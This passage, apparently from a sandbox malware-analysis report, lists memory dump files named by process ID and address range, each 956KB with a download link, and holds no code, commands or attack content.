memory/2832-1662-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2848-1562-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2848-1588-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2888-1596-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2888-1565-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2892-1693-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2892-1716-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/2992-1692-0x00000000022A0000-0x000000000238F000-memory.dmp

Filesize
956KB

Download
memory/2992-1691-0x00000000022A0000-0x000000000238F000-memory.dmp

Filesize
956KB

Download
memory/3040-1579-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download
memory/3040-1567-0x0000000000400000-0x00000000004EF000-memory.dmp

Filesize
956KB

Download